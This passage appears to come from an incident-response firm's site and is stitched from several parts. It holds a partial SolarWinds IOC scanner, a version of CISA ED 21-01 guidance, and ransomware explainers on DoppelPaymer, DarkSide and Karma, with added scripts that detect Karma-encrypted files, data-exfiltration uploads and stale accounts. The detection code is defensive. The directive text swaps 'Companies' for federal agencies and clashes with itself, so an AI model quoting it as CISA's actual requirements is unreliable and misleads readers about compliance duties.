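            f.write(b"unrelated file that must not be reported")
        return sorted((v, os.path.basename(p)) for v, p, _ in scan([tmp]))
    finally:
        shutil.rmtree(tmp, ignore_errors=True)

if __name__ == "__main__":
    for verdict, name in demo():
        print(f"{verdict:10} {name}")
```

On a real host, run `scan()` over every fixed drive from a privileged context and record the path and digest of each hit alongside the host name, since item 3 requires the existence of the indicator to be reported rather than merely remediated. A `hash-match` is reportable on its own; a `name-only` result is expected on a clean Orion install and only warrants escalation if the digest matches an indicator published later under item 3c.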

Companies that were using affected versions at any time prior to the issuance of ED 21-01 must:

  1. Keep these products disconnected as required by ED 21-01 pending further CISA guidance and not rebuild or reimage the affected platforms and host operating systems (OS), including (re)joining the host OS to the enterprise domain, until such time as CISA directs otherwise.

  2. Label and isolate all backups of the affected versions from their systems to prevent accidental re-introduction of malicious code to the production environment.

  3. Conduct forensic analysis or search, as appropriate based on capability, for indicators of compromise (IOCs) or other evidence of threat actor activity.
    a. Companies running affected versions that have no capability to conduct forensic analysis (system memory, host storage, network) shall, at minimum, search for IOCs or other evidence of threat actor activity published in ED 21-01, Activity Alert AA20-352A, and future associated guidance.
    b. Companies that find matches to these IOCs or evidence of threat actor activity through forensics analysis must report this as an incident to CISA through https://us-cert.cisa.gov/report. If a reporting agency already submitted incident information to CISA, please send updates to CISA as you discover new evidence.
    c. Companies running affected versions that have no capability to conduct forensic analysis and no capability to search for IOCs shall assume breach, report the incident to CISA through https://us-cert.cisa.gov/report, and contact central@cisa.dhs.gov to coordinate finding a qualified service provider capable of conducting forensics.

Federal Information Systems Hosted in Third-Party Environments (such as Cloud)

CISA is working closely with FedRAMP to coordinate the response to ED 21-01 with FedRAMP Authorized cloud service providers (CSPs). FedRAMP Authorized CSPs have been informed to coordinate with their agency customers.

1. If FedRAMP Authorized CSPs are affected, their agency customers must report incidents to CISA in accordance with ED 21-01. Companies hosting information in any third-party environment (FedRAMP Authorized or otherwise) must identify and contact their third-party service providers directly for status pertaining to, and to ensure compliance with, ED 21-01.

2. Companies are also instructed to supplement their reporting under ED 21-01 to incorporate relevant information from third-party service providers (to the extent that Companies have not already included this information), including to report any incident through CISA. In your incident reporting, please identify what data was exposed to the third-party service provider.

Conditions for Reconnecting Unaffected Versions

At this time, CISA is still assessing whether it is appropriate to relax ED 21-01’s requirement that Companies not install patches for their SolarWinds Orion software. Some older versions of SolarWinds Orion have been identified as not affected by the malicious backdoor. However, operating such older versions carries significant risk, because (1) like other types of older software, older versions of SolarWinds Orion contain known vulnerabilities; (2) the adversary that inserted the SolarWinds Orion backdoor is likely to be intimately familiar with SolarWinds Orion code, including known or unknown vulnerabilities that may exist separate and apart from the backdoor; and (3) this adversary has demonstrated the capability and willingness to exploit SolarWinds Orion to compromise U.S. government agencies, critical infrastructure entities, and private organizations.

Companies are permitted to power back up and reintroduce into an agency production environment SolarWinds Orion instances that were disconnected pursuant to ED 21-01 only if each of the following conditions are met:

1. The instance currently uses an unaffected version of SolarWinds Orion, as listed below.

a. Orion Platform 2019.4 2019.4.5200.8890

b. Orion Platform 2019.4 HF1 2019.4.5200.8950

c. Orion Platform 2019.4 HF2 2019.4.5200.8996

d. Orion Platform 2019.4 HF3 2019.4.5200.9001

e. Orion Platform 2019.4 HF4 2019.4.5200.9045

2. The instance did not previously use an affected version (i.e., the instance was never rolled back from an affected version) and the instance is not restored from an affected version.

3. The agency first (1) hunts for threat actors in their environment using all IOCs and indicators of threat actor activity published about this threat activity in ED 21-01, Activity Alert AA20-352A, and any additional related guidance related to this activity published by CISA or provided by the information security community prior to the instance being reintroduced to the environment, and (2) finds no evidence of such threat actor activity.

4. The agency conducts a risk assessment to assess the impact of reintroducing the Orion Platform into agency production environments and accepts residual risk associated with running this unpatched software containing known vulnerabilities until such time as CISA permits companies to patch these products.

5. Block all incoming and outgoing (any:any) Internet traffic to and from hosts running SolarWinds Orion products (as required by ED 21-01).

6. Follow the SolarWinds hardening guidelines provided by the vendor, which can be found at:  https://documentation.solarwinds.com/en/Success_Center/orionplatform/content/core-secure-configuration.htm

EXCEPT:

a. Companies shall not configure the SolarWinds software to implement SAML-based authentication that relies on Microsoft’s Active Directory Federated Services. This configuration is currently being exploited by the threat actor associated with this activity.

b. Companies shall not follow the hardening guideline’s requirement to ensure their SolarWinds instance is patched to the latest version, pending further direction from CISA to do so.

7. Ensure that the SolarWinds logs are being sent to the agency SOC for action.

Other Versions

Companies continuing to run instances of SolarWinds Orion with other versions must comply with steps 5-7 listed for unaffected versions.

Companies may apply updates to the host operating systems running SolarWinds Orion products in accordance with their respective vulnerability and patch management policies and programs.

All other provisions specified in ED 21-01 remain in effect.

References

SolarWinds:

https://documentation.solarwindsmsp.com/N-central/Rel_2020-1-2_HF2/N-central_2020-1-2_HF2_ReleaseNotes_en.pdf

Insinuator:

https://insinuator.net/2020/12/security-advisories-for-solarwinds-n-central/

CVE:

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25617

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25618

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25620

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25621

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25622

News

How Blackpanda deploys darknet scanning in incident response

Asia’s premier incident response company Blackpanda and top US darknet intelligence company DarkOwl are pleased to announce a partnership that will provide Blackpanda’s clients with expanded protection and detection of cyber risk.

Blackpanda is proud to be partnering with DarkOwl to provide darknet scans as a part of all incident response and compromise assessment services to our clients. 

Blackpanda addresses cyber attacks from all varieties of malware, ransomware or business email compromise. Stationed in cities across the Asia-Pacific region, we have a hyper focus on digital forensics and incident response.

The incident response lifecycle

Incident response starts with a call, an alert, or an automated indicator that comes from one of our intelligent platforms or an endpoint detection and response tool.

Once we receive such an alert, we then move on to determine the validity and extent of the attack. Essentially, incident responders scope out what happened and assess what resources we need to deploy in order to address the attack.

After this, the triage process starts. Our digital forensics specialists gather evidence, with the goal of finding indicators of compromise. In the meantime, incident responders develop a plan of action and work with the client in order to stop the infection from spreading any further.

The containment phase follows, where incident responders actively block the malware and stop it from carrying out damage to the system. 

All this happens within the first 48 hours following initial notification of an attack. By working around the clock, Blackpanda DFIR specialists are able to swiftly figure out who the threat actor is and have an idea of what assets and data could be at risk.

What data has been leaked?

After the malware has been eradicated, we typically hear the same question from our clients: ‘What data has been leaked?’ 

This is a very important thing to evaluate, as leaked data may contain sensitive information such as emails, passwords, or proprietary files. Hackers often post this information on darknet forums, effectively increasing the company’s vulnerability to a second attack. 

Having access to DarkOwl’s darknet scanning tools at this point is extremely helpful. This way, we are able to actively and continuously monitor the darknet and look up darknet data from over 30,000 websites as part of the services we offer our clients.


What information is available on the darknet?

Among the types of data that are found in the darknet are very large quantities of personally identifiable information and credentials to compromised accounts which can be used by attackers to spread ransomware. Additionally, darknet forums host chatter amongst threat actors, which if identified, can help us predict which organizations they are likely to target next.

We can also find many vendor and supply chain risk indicators. Most recently, in the context of the Ukraine-Russia war, we are finding significant indicators of risk among vendors and supply chains that have a presence in Ukraine, Belarus and Russia.

With such access to darknet data, Blackpanda can then work on ‘connecting the dots' and delivering relevant intelligence to make informed predictions of the risks organizations face. 

Working together to protect organizations in APAC from cyber attacks

Blackpanda is Asia’s premier ‘cyber firefighting’ firm, offering specialized digital forensics and incident response for organizations in the region. 

By leveraging DarkOwl’s Vision platform, Blackpanda is able to offer darknet intelligence to clients and guide them in carrying out appropriate action to mitigate near and long term risks while informing their overall cyber security posture.

About Blackpanda

Blackpanda is Asia’s premier digital forensics and incident response firm, hyper-focused solely on digital forensics and cyber crisis response. Our team consists of an elite cadre of risk and security experts from international special forces, intelligence, forensics, and law enforcement backgrounds. We are highly trained, ready to respond to and help manage crises on short notice, when and wherever needed. To learn more, please visit www.blackpanda.com

About DarkOwl

We are darknet experts. DarkOwl was founded in 2016, and we are the world's leading provider of DARKINT™, darknet intelligence and offer the largest commercially available database of darknet content. DarkOwl enables cybersecurity organisations, law enforcement and government organisations to fully understand their security posture, detect potential breaches and violations of the law and mitigate them quickly. We offer a variety of options to access our data, please visit us at www.darkowl.com.

The Basics

What is DoppelPaymer Ransomware?

DoppelPaymer is a type of malicious software that infiltrates an endpoint through a link or download file, encrypts important files on the computer, and then spreads to other endpoints in the network.

DoppelPaymer is a type of malicious software that infiltrates an endpoint through a link or download file, encrypts important files on the computer, and then spreads to other endpoints in the network. Attackers then send a message to the encrypted computers with instructions on how to pay the ransom amount—usually in the Bitcoin cryptocurrency—in order to restore the files. In DoppelPaymer’s case, ransom demands for file decryption range anywhere from USD 25,000 to USD 1.2 million.

Additionally, in February 2020, the malicious actors behind DoppelPaymer launched a data leak site, threatening victims with the publication of their stolen files on the site as part of the ransomware’s extortion scheme. DoppelPaymer ransomware is among the most active threats right now, and companies should be aware of its risks and prepare for an attack by ensuring they have a clear incident response plan in place.

DoppelPaymer’s primary targets are organizations in the healthcare, emergency services, and education industries. The ransomware was involved in a number of high-profile attacks in 2020 and 2021, targeting community colleges, police, emergency services in the US, a German hospital, and Kia Motors, amongst others.

The Link Between DoppelPaymer and BitPaymer

DoppelPaymer ransomware was first discovered in April 2019, and it is believed to be based on the BitPaymer ransomware, which first appeared in 2017. Since then, a link between the two ransomware variants has been established due to similarities in their code, ransom notes, and payment portals.

However, there are three key differences between DoppelPaymer and BitPaymer. For one, DoppelPaymer uses 2048-bit RSA + 256-bit AES for encryption, while BitPaymer uses 4096-bit RSA + 256-bit AES, with older versions using 1024-bit RSA + 128-bit RC4. DoppelPaymer also improves upon BitPaymer’s rate of encryption by using threaded file encryption, which allows for the encryption of entire endpoints within seconds.

The third key difference between the two ransomware families is that DoppelPaymer requires a specific command-line parameter in order to execute its malicious routines. This technique is possibly used by the attackers to avoid detection via sandbox analysis as well as to prevent security researchers from studying the samples.

Who is Behind DoppelPaymer?

DoppelPaymer has been attributed to the threat group known as Indrik Spider. But, who is Indrik Spider? 

Indrik Spider was formed in 2014 by former affiliates of the GameOver Zeus criminal network. The group soon developed their own custom malware, known as Dridex. Whilst early versions of Dridex were primitive, over time the malware became increasingly professional and sophisticated. Between 2015 and 2016, Dridex was one of the most prevalent malware families, primarily being used to conduct wire fraud. The arrest of a member of the group set back Indrik Spider’s operations.

In 2017, the group reappeared on the cyber crime landscape rebranded as Grief Group, in an effort to appear like a separate actor. Grief Group conducted smaller Dridex distribution campaigns, introducing BitPaymer ransomware—DoppelPaymer’s antecedent—and focused on leveraging access within a victim organization to demand high ransom payments. In 2019, DoppelPaymer appeared as a highly dangerous evolution of BitPaymer, targeting organizations worldwide. A famous case was the attack on Kia Motors in February 2021, where the ransom request amounted to USD 20 million.

How does DoppelPaymer Work?

DoppelPaymer uses a fairly sophisticated routine to gain access into a target network and conduct its activities. A typical attack starts with network infiltration via malicious spam emails containing spear phishing links or attachments. Such emails are especially designed to lure unsuspecting users into executing malicious code that is usually disguised as a genuine-looking document. 

The code then downloads the Emotet Trojan into the victim’s system. The Trojan is specialized in evading detection from common antivirus programs. Emotet also communicates with its command-and-control (C&C) server to install various DoppelPaymer modules as well as to download and execute other tools, including PowerShell Empire, Cobalt Strike, Mimikatz, and PsExec. Each of these tools is used for specific activities, such as stealing credentials, moving laterally inside the network, and executing commands for disabling security software.

The malicious actors do not immediately deploy the ransomware upon initial access. Instead, they try to move laterally within the affected system’s network through Dridex, in search of high-value targets to steal critical information from. Once such a target is found, Dridex executes its final payload, DoppelPaymer. DoppelPaymer encrypts files found in the network as well as fixed and removable drives in the affected system.

As a final step, DoppelPaymer changes user passwords and forces a system restart into safe mode to prevent user entry. When a user tries to start an infected machine, DoppelPaymer’s ransom note appears on screen. The note warns users not to reset or shut down the system, as well as not to delete, rename, or move the encrypted files. The note also contains a threat that sensitive data will be shared with the public if they do not pay the ransom demanded from them.

How to prevent a DoppelPaymer attack?

Use this checklist to prevent a DoppelPaymer ransomware attack and prepare for a breach in order to be resilient to its impact.

PRE-BREACH PREP 

  • Use an EDR Service 
  • Prepare an Incident Response Plan and Team  
  • Purchase a Cyber Insurance Policy 

ACTIVE BREACH RESPONSE 

  • Disconnect or Shut Down Computing Devices
  • Contact a Trusted IR Team 
  • Document All Significant Events and Actions 

POST-BREACH MANAGEMENT  

  • Deploy EDR Services 
  • Regularly Patch and Update 
  • Ensure Effective Backups Exist  
  • Tighten Security Configurations 
  • Have a Plan and Team in Place for Future Breaches 
  • Ongoing Cyber Awareness Training for Employees 
  • Insure Against Future Cyber Losses 

The DoppelPaymer ransomware strain is a relatively new and high-risk cyber threat. Being an evolved BitPaymer, it is able to encrypt entire networks within minutes from penetrating an endpoint. With large ransom demands and widespread targets, organizations in the APAC region should be on guard. 

The best way to prepare for a ransomware attack is to ensure that you have a clear incident response plan in place. Falling victim to ransomware can be a stressful and emotional time, and an experienced incident response (IR) company such as Blackpanda provides invaluable help in containing the attack, eradicating the malware, and restoring business as usual, all whilst managing PR, negotiating with the attackers, and ensuring safety and legality throughout. 

At Blackpanda, our experienced team of ransomware professionals guide organizations through the process of dealing with a ransomware attack, helping to minimize losses, recover encrypted data, as well as negotiate and facilitate ransom payment. 

By contacting Blackpanda, we can support you in building up the resilience that your organization needs to survive a ransomware attack. Contact us today to learn more.

The best cyber incident response and risk management solution for small and medium businesses: IR-1 

Waiting for an attack to happen before you contact a cyber incident response team can cost precious time and a high hourly fee, which is why pre-purchasing a retained solution is the best way to optimise response time and minimise costs.

Blackpanda’s IR-1 subscription is the most effective solution for small and medium enterprises in Asia Pacific facing limited resources and knowledge in managing cyber breaches. IR-1 aims to help them manage cyber breaches and mitigate their impact by offering a 12-month subscription plan that includes 24/7 incident response availability, one incident response activation credit, discounted rates for Blackpanda services, and unlimited access to a digital library. IR-1 is staffed by highly trained specialists, and businesses can renew the subscription upon expiry.

Get in touch with us to learn more about IR-1.

The Basics

What is DarkSide ransomware?

Companies in Asia should view DarkSide as a dormant threat that could awaken at any time, ready to strike, and should learn from past attacks to prepare themselves.

The DarkSide ransomware gang announced its existence in August 2020. Less than a year later, the gang announced that they were ceasing operations, and shut down in May 2021, making it a short-lived yet extremely destructive criminal project that caused—amongst other high profile attacks—significant business interruptions to one of the biggest oil companies in the world.

While it was the May 2021 Colonial Pipeline attack that brought the name DarkSide into the global public discourse, security experts and criminal justice authorities have assessed DarkSide’s level of sophistication as high. This has led threat intelligence analysts to hypothesise that the DarkSide gang was made up of veteran cyber criminals undergoing a rebranding, and to warn that we may soon see the DarkSide criminals appear in the cyber threat landscape under a new name.

Being aware of such a possibility, in November 2021, the US government declared that it is offering a USD 10 Million bounty for anyone who successfully reports the names of any DarkSide members. 

Who is DarkSide?

DarkSide is the name of a cyber criminal group believed to be based in Eastern Europe and run by former affiliates of other ransomware gangs who decided to come up with their own brand of malware. 

The attackers used highly sophisticated ransomware techniques against large for-profit organisations, encrypting their data under threat of publishing it on the open web. In exchange for a decryption key, DarkSide demanded ransom payments between USD 200,000 and USD 2 Million.

DarkSide presents itself as an "enterprise" gang due to its professional-looking website and attempts to partner with journalists and decryption companies. One key element of DarkSide’s branding is its mostly-consistent provocative public persona, presenting itself as a champion of the working people. In line with this, DarkSide firmly stated that they do not target the government, education, healthcare, funeral and non-profit sectors, and only aimed at making money from larger independent corporations.

This was reinforced by a Twitter post shared by DarkSide stating “Our goal is to make money, and not to create problems for society.” In a dark web post, the group posted receipts for donations of BTC 0.88 (then worth USD 10,000) each to Children International and to The Water Project, dated October 2020.

DarkSide conducts its activities according to a Ransomware as a Service (RaaS) business model, whereby the group provides third-party clients with the tools to carry out a ransomware attack, receiving commission as part of the extorted sum. Based on forum advertisements, the RaaS operators take 25% for ransom fees less than USD 500,000 but this decreases to 10% for ransom fees greater than USD 5 Million.

DarkSide promotes its ransomware by offering the option to publish victim data in stages—which may put additional pressure on victims to pay the ransom—and flaunting that their go-to data leak website receives “stable visits and media coverage.”

DarkSide adheres to the practice of double extortion, which involves demanding separate sums for both a digital key needed to unlock any files and servers, and a separate ransom in exchange for a promise to destroy any data stolen from the victim.

How does DarkSide Ransomware work?

DarkSide ransomware penetrates a company’s network and spreads across active endpoints within minutes, encrypting all information on the infected endpoints rendering it irrecoverable unless the ransom is paid. 

Unlike other ransomware types that access computers through phishing links and email attachments, DarkSide’s sophisticated ransomware leverages backdoors in a network—akin to Palo Alto’s CVE-2019-1579 and Microsoft Exchange vulnerabilities—and compromised organisation connections. By infecting one company first and then spreading across to third-party partners, an unauthenticated attacker is able to execute malicious code remotely and carry out a breach.

DarkSide ransomware variants use the Silent Night botnet—also known as Zloader—for delivery. Zloader is a variant of the Zeus financial malware that has been targeting banks since 2006 and works as a first-stage Trojan loader that infects a victim's peripheral domain. Once a foothold is established, the Cobalt Strike red teaming tool is used to spread and deploy DarkSide ransomware.

After being downloaded onto network endpoints, DarkSide ransomware proceeds to encrypt files. It does this using the Salsa20 cipher, equipped with a custom matrix, together with RSA-1024 encryption. Salsa20 is a fast stream cipher, which makes the encryption near impossible to halt once it is running in the network. DarkSide ransomware then kills processes that could hold files open or unlock them, and replaces the desktop wallpaper with its ransom note.

Once the endpoint is encrypted and the message is displayed, users have a few days to pay out the ransom. When requested, DarkSide affiliates can provide “proof of life” by decrypting a small portion of the data to prove that they indeed have a working decryption key.

Notable Events

Perhaps the most notable event involving DarkSide is the May 2021 attack on Colonial Pipeline, which caused the shutdown of the pipeline that transports gasoline from Texas to the northeast of the United States, causing massive petrol shortages for consumers as well as disruptions to oil-dependent supply chains. On a given day, Colonial Pipeline carries 2.5 Million barrels of gasoline, diesel, heating oil, and jet fuel along its 5,500-mile route, providing nearly half of the East Coast’s fuel supply.

Colonial was able to use data backups to partially restore operations within a week from the attack, but the national average price for a gallon of petrol had pushed past USD 3 for the first time in almost a decade. President Joe Biden declared a State of National Emergency due to the attack and Colonial Pipeline eventually paid the Bitcoin equivalent of USD 4.4 Million to receive a decryption key and prevent its data from being publicly disclosed.

DarkSide's blog activity and Bitcoin wallet show that the group’s ransomware variants were highly active aside from the famous Colonial incident. In fact, cryptocurrency security firm Elliptic stated that a Bitcoin wallet opened by DarkSide in March 2021 had received USD 17.5 Million from 21 Bitcoin wallets (including the Colonial Pipeline ransom). In total, DarkSide received over USD 90 Million in ransom payments from at least 47 victims.

How to Prevent a DarkSide attack?

Whilst DarkSide is currently a dormant threat, the gang’s members are likely still active in the cyber crime scene and are predicted to re-emerge with new ransomware variants in the near future. Proper cyber hygiene, including regular offline backups, tightened security configurations, recurring patching, and installing a powerful EDR tool, is a proven strategy for protecting yourself from ransomware and bolstering your cyber defences. 

On top of this, preparing an incident response plan in collaboration with a specialist team like Blackpanda is crucial to minimise response time and losses in the event of a ransomware attack. As Asia’s premier Digital Forensics and Incident Response provider, we support our clients through best-in-class services like regular compromise assessments, tabletop exercises, and the creation of bespoke incident response plans. 

Protect & Defend

Karma ransomware rapid evolution

Initially discovered at the end of June 2021, Karma ransomware is a relatively new malware. Researchers from SentinelOne found that the individual developer, known by the name ‘Eugene’, is rapidly updating Karma and continuously adapting it to cutting edge ransomware techniques. There is a strong possibility that affected companies have paid the requested ransoms, based on the lack of comment activity from Karma Site_admin on dark web forums.

Who is at risk? 

Karma ransomware has been observed targeting various organisations across several sectors with no specific industry targets. Researchers say at least eight different companies have been affected by Karma between 2021-06-18 and 2021-06-25. So far, there have been no corporate data leaks. From this, we assume that the victims have paid the ransom or are in the process of negotiating payments to prevent data leaks.

Each of the eight concurrent versions of the ransomware seems to be improving and rapidly evolving to stay up to date with the latest ransomware techniques. This pace of evolution suggests that the developer, ‘Eugene’, is highly skilled and chooses victims carefully to target the most vulnerable.

How does Karma work? 

Karma ransomware prevents access to an organisation’s data by encrypting files and systems. It does this through the following encryption process:

  1. Generate a random ChaCha20 key
  2. Encrypt the file with ChaCha20
  3. Encrypt the ChaCha20 key with a hardcoded ECC public key
  4. Append the encrypted key to the encrypted file
  5. Append “KARMA”

Once files and data have been encrypted by Karma, targeted organisations are given instructions on how to pay the ransom to prevent their information from being sold or released to the dark web.
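The encryption process above leaves two things a responder can look for on disk: a body of near-uniformly random bytes (the ChaCha20 ciphertext) and the trailing “KARMA” marker. The following scanner is an added illustration of that triage check, written for this page; it is not Karma’s code nor SentinelOne’s or Blackpanda’s tooling. It assumes the marker is the literal bytes `KARMA` at the very end of the file (step 5) and, because the page does not give the length of the appended encrypted key, it does not try to parse that key; it only measures the randomness of everything before the marker. Both the sample files and the 7.5 bits-per-byte entropy threshold are constructed for the example.

```python
import math
import random
from collections import Counter

# Trailing marker the page says Karma appends (step 5). Assumed to be the
# literal bytes at the end of the file; the length of the encrypted ChaCha20
# key written before it (step 4) is not given, so it is not parsed here.
KARMA_MARKER = b"KARMA"
ENTROPY_THRESHOLD = 7.5  # bits per byte; office documents and text sit far below


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte; uniformly random data approaches 8.0."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def has_karma_marker(data: bytes) -> bool:
    """True if the file ends with the marker described in step 5."""
    return data.endswith(KARMA_MARKER)


def looks_encrypted(data: bytes) -> bool:
    """Heuristic: the body before the marker is near-uniformly random."""
    body = data[:-len(KARMA_MARKER)] if has_karma_marker(data) else data
    return len(body) >= 256 and shannon_entropy(body) >= ENTROPY_THRESHOLD


def classify(data: bytes) -> str:
    """'karma' = marker plus random body, 'suspicious' = random body only,
    'clean' = neither. Entropy alone is a weak signal (compressed or random
    files also score high), which is why the marker is checked separately."""
    marker = has_karma_marker(data)
    random_body = looks_encrypted(data)
    if marker and random_body:
        return "karma"
    if random_body:
        return "suspicious"
    return "clean"


def scan(files: dict) -> dict:
    """Classify each name -> bytes entry; returns name -> verdict."""
    return {name: classify(data) for name, data in files.items()}


# Constructed sample set (seeded so the result is reproducible): a plain text
# report, a file imitating the layout described on the page (random
# 'ciphertext' + random 'encrypted key' + marker) and a random blob without
# the marker, which shows why entropy by itself is only 'suspicious'.
_rng = random.Random(1)
SAMPLE_FILES = {
    "report.txt": b"Quarterly report: revenue up 4%, headcount flat.\n" * 40,
    "report.txt.KARMA": _rng.randbytes(4096) + _rng.randbytes(64) + KARMA_MARKER,
    "cache.bin": _rng.randbytes(2048),
}

if __name__ == "__main__":
    for name, verdict in scan(SAMPLE_FILES).items():
        print(f"{name:20} {verdict}")
```

In an engagement this would run over a mounted image or a file listing rather than an in-memory dictionary, and a hit on a shared drive is the cue to isolate the host that last wrote to it rather than to start cleaning files.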

How can I protect myself? 

Here is a list of actionable items you can take to protect your company from ransomware:

  • Building staff awareness of phishing attacks, including best practices for downloading and installing apps, choosing strong passwords and not reusing them on personal websites;
  • Creating offline backups;
  • Separating network subsystems, and ensuring each of them has its own firewalls and gateways;
  • Monitoring for large file uploads;
  • Adopting email security best practices, filtering out malicious file types (EXE, VBS, XLS with macros), and executing them in a local sandbox;
  • Organisations that have been impacted by any ransomware attack should immediately contact Blackpanda’s expert ransomware response and negotiation specialists.
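“Monitoring for large file uploads” is the item on that list most often left as a good intention, because the data exfiltration that precedes a double-extortion demand hides among ordinary traffic. The detector below is an added example written for this page, not Blackpanda’s tooling; it runs two complementary rules over a constructed proxy log (the `<timestamp> <src_ip> <destination> <bytes_sent>` layout, the hosts, destinations and the 500 MiB / 1 GiB thresholds are all assumptions for the example): a single oversized transfer, and a sliding one-hour total per source host that catches uploads deliberately split into smaller pieces.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed proxy log (not real telemetry): "<ISO timestamp> <src_ip> <dest> <bytes_sent>".
# 10.0.5.44 sends three huge files; 10.0.5.77 sends four 300 MiB chunks that
# are individually unremarkable but add up to more than 1 GiB within an hour.
SAMPLE_LOG = """\
2021-06-20T09:01:12 10.0.5.21 crm.example.com 18234
2021-06-20T09:04:55 10.0.5.21 mail.example.com 40211
2021-06-20T09:10:03 10.0.5.44 filedrop.example.net 734003200
2021-06-20T09:25:41 10.0.5.44 filedrop.example.net 812345678
2021-06-20T09:40:09 10.0.5.44 filedrop.example.net 698122000
2021-06-20T10:02:00 10.0.5.77 sync.example.org 314572800
2021-06-20T10:17:00 10.0.5.77 sync.example.org 314572800
2021-06-20T10:33:00 10.0.5.77 sync.example.org 314572800
2021-06-20T10:49:00 10.0.5.77 sync.example.org 314572800
2021-06-20T11:15:30 10.0.5.21 updates.example.com 5120000
"""

SINGLE_LIMIT = 500 * 1024 * 1024   # any one transfer above 500 MiB (assumed threshold)
WINDOW_LIMIT = 1024 * 1024 * 1024  # more than 1 GiB from one host per window (assumed)
WINDOW = timedelta(hours=1)


def parse_line(line: str):
    ts, src, dst, sent = line.split()
    return datetime.fromisoformat(ts), src, dst, int(sent)


def detect_large_uploads(log_text: str, single_limit=SINGLE_LIMIT,
                         window_limit=WINDOW_LIMIT, window=WINDOW):
    """Return a list of (rule, src_ip, detail) alerts."""
    events = sorted((parse_line(l) for l in log_text.splitlines() if l.strip()),
                    key=lambda e: e[0])
    alerts = []

    # Rule 1: a single transfer larger than the limit.
    for ts, src, dst, sent in events:
        if sent > single_limit:
            alerts.append(("single_large_upload", src,
                           f"{sent} bytes to {dst} at {ts.isoformat()}"))

    # Rule 2: sliding-window total per source host, which catches chunked uploads.
    per_host = defaultdict(list)
    for ts, src, _dst, sent in events:
        per_host[src].append((ts, sent))
    for src, rows in per_host.items():
        start, total = 0, 0
        for ts, sent in rows:
            total += sent
            while ts - rows[start][0] > window:   # drop rows that left the window
                total -= rows[start][1]
                start += 1
            if total > window_limit:
                alerts.append(("window_volume", src,
                               f"{total} bytes within {window} ending {ts.isoformat()}"))
                break  # one alert per host is enough to trigger triage
    return alerts


if __name__ == "__main__":
    for rule, src, detail in detect_large_uploads(SAMPLE_LOG):
        print(f"{rule:20} {src:12} {detail}")
```

The thresholds need tuning to the environment (backup agents and cloud sync clients will trip a naive volume rule), and in practice the destination is the more useful pivot: a large volume to a host nobody in the business recognises is the alert worth waking someone up for.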

Additionally, all organisations should follow these:

1. Stronger passwords:

Many of the most significant ransomware attacks that have occurred were due to simple passwords obtained through brute force attacks or dark web data breach sales. Ensure all employees use long passwords that include symbols, numbers, and upper/lower case letters and that are not derived from personally identifiable information such as names, addresses, or birthdays.

2. Activate multi-factor authentication:

Ensure every access point within your systems requires MFA. This provides an added layer of security and decreases the chance that a brute force attack will be able to access your data.

3. Adhere to the principle of least privilege:

The Principle of Least Privilege is the idea that any user, program, or process should have only the bare minimum privileges necessary to perform its function. The principle of least privilege works by allowing only enough access to perform the required job. In an IT environment, adhering to the principle of least privilege reduces the risk of attackers gaining access to critical systems or sensitive data by compromising a low-level user account, device, or application.

4. Sweep out old user accounts and passwords:

Audit the current user list and remove stale usernames and passwords that still have access to your critical infrastructure.
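The audit in point 4 is easy to describe and tedious to do by hand, so it tends not to happen. The script below is an added example for this page (not Blackpanda’s or any vendor’s tool) of the checks a practitioner would run over a user export: enabled accounts with no logon in the last 90 days, accounts that have never logged on at all, and passwords older than a year, with members of privileged groups sorted to the top. The CSV layout, the account names, the group names and the 90-day / 365-day cut-offs are all constructed assumptions; a real export from a directory or identity provider would need its column names mapped onto these.

```python
import csv
import io
from datetime import date

# Constructed directory export (no real environment). Empty last_logon means
# the account has never signed in.
SAMPLE_EXPORT = """\
username,enabled,last_logon,pwd_last_set,groups
a.tan,true,2021-06-24,2021-03-01,Staff
contractor01,true,2020-11-02,2020-11-02,Staff;VPN-Users
svc_backup,true,,2019-05-14,Backup-Operators
old.admin,true,2021-01-10,2019-12-31,Domain-Admins
j.lee,false,2020-02-02,2020-02-02,Staff
"""

AS_OF = date(2021, 6, 25)          # "today" for the sample; fixed so results are reproducible
STALE_DAYS = 90                    # assumed policy: no logon in 90 days = stale
PASSWORD_MAX_AGE_DAYS = 365        # assumed policy: rotate at least yearly
PRIVILEGED_GROUPS = {"Domain-Admins", "Backup-Operators"}  # assumed group names


def _days_since(value: str, today: date):
    """Days between an ISO date string and today; None if the field is empty."""
    return None if not value else (today - date.fromisoformat(value)).days


def audit_accounts(export_text: str, today: date = AS_OF):
    """Return (username, finding, is_privileged) tuples, privileged accounts first."""
    findings = []
    for row in csv.DictReader(io.StringIO(export_text)):
        if row["enabled"].strip().lower() != "true":
            continue  # disabled accounts cannot be used to log in; skip them
        user = row["username"]
        groups = set(row["groups"].split(";")) if row["groups"] else set()
        privileged = bool(groups & PRIVILEGED_GROUPS)
        idle = _days_since(row["last_logon"], today)
        pwd_age = _days_since(row["pwd_last_set"], today)

        if idle is None:
            findings.append((user, "never_logged_on", privileged))
        elif idle > STALE_DAYS:
            findings.append((user, "stale_logon", privileged))
        if pwd_age is not None and pwd_age > PASSWORD_MAX_AGE_DAYS:
            findings.append((user, "old_password", privileged))

    # Privileged accounts first, then alphabetical; sort is stable so a user's
    # findings keep their order.
    findings.sort(key=lambda f: (not f[2], f[0]))
    return findings


if __name__ == "__main__":
    for user, finding, privileged in audit_accounts(SAMPLE_EXPORT):
        print(f"{'PRIV ' if privileged else '     '}{user:14} {finding}")
```

Service accounts that have never interactively logged on (like the backup account in the sample) are the usual false positive here; the fix is not to whitelist them silently but to record why each one exists and what it is allowed to do, which is point 3 applied to point 4.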

5. Update all software and security patches:

Software and security partners are constantly updating their software to keep up with the daily evolution of hacking technology. It is important for your organization to apply updates and patches whenever available.

6. Back up your systems and data offline:

Employ strong, frequent backups to have important files and systems recoverable in the event of an attack.

7. Implement an Endpoint Detection and Response (EDR) solution:

An EDR system can help detect threats that are within your system so that you can respond to them in the quickest way possible. EDR solutions like SentinelOne can better protect your environment from ransomware attacks and other threats.

8. Have a risk transfer solution and cyber IR plan in place

